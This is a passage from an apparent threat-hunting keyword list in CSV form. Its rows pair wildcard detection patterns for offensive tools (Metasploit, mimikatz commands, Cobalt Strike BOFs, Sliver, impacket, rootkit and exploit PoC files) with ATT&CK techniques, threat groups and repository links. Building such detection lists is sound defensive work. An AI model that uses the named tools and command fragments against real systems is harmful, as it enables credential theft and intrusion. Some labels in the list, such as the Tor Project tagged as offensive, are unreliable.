- T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rookuu/BOFs/*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*Root backdoor obtained!*,offensive_tool_keyword,POC,This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800),T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/Immersive-Labs-Sec/nimbuspwn,1,0,N/A,N/A,1,21,5,2022-05-05T10:02:27Z,2022-04-27T13:04:33Z -*root/SecurityCenter2* -ClassName AntiVirusProduct*,greyware_tool_keyword,powershell,list AV products with powershell,T1518.001 - T1082,TA0007 - TA0005,N/A,N/A,Discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*root\cimv2:Win32_Implant*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*root_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Rootkit.cpp*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*Rootkit.Win64.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword for ransomware,T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497,TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010,N/A,N/A,Ransomware,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*root-shellcode-linux*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rop.find_gadgets*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*RopChain.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*ROPEngine.cpp*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropfuscator *,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,0,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ROPfuscator*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropfuscator-*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropfuscator.*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropnop/go-windapsearch*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ropnop/kerbrute*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*rottenpotato.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rottenpotato.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RottenPotatoVulnerable.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*routerpasswords.com/*,offensive_tool_keyword,routerpasswords.com,find default routers passwords,T1110.003 - T1200,TA0001 - TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,1,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*routers_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RouterScan.exe*,greyware_tool_keyword,routerscan,Router Scan is able to find and identify a variety of devices from large number of known routers on your internal network,T1046 - T1083 - T1018 - T1116,TA0007 - TA0010 - TA0003,N/A,N/A,Network Exploitation tools,https://en.kali.tools/?p=244,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*routersploit*,offensive_tool_keyword,routersploit,The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits,T1210.001 - T1190 - T1213 - T1189,TA0007 - TA0002 - TA0001 - TA0011,N/A,N/A,Frameworks,https://github.com/threat9/routersploit,1,1,N/A,N/A,10,11408,2303,2023-05-22T21:50:32Z,2016-03-30T11:43:12Z -*rpc://* -rpc-mode ICPR -icpr-ca-name *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*rpc::close*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpc::connect*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpc::enum*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpc::server*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpcattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*rpcattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpc-backdoor.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpc-beacons.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpcdump.py * | grep MS-RPRN*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*rpcdump.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpcdump_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*rpc-hijack.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpc-kill.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpcmap.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpc-msf.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpcrelayclient.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpcrelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*rpcrt4_new.dll*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/websecnl/CVE-2022-26809,1,1,N/A,N/A,1,29,6,2022-04-19T17:04:04Z,2022-04-14T08:12:24Z -*rpcrt4_old.dll,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/websecnl/CVE-2022-26809,1,1,N/A,N/A,1,29,6,2022-04-19T17:04:04Z,2022-04-14T08:12:24Z -*rpc-shellcode.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpivot.zip*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*rpivot-master*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*rpm.torproject.org/*public_gpg.key*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rsactftool --*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rsactftool* --dumpkey --key *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rshijack*,offensive_tool_keyword,rshijack,tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. then inject a tcp packet into the telnet connection:,T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004,TA0011 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/kpcyrd/rshijack,1,0,N/A,N/A,5,402,41,2023-06-03T16:37:11Z,2018-02-23T02:21:45Z -*rsmudge/ElevateKit*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 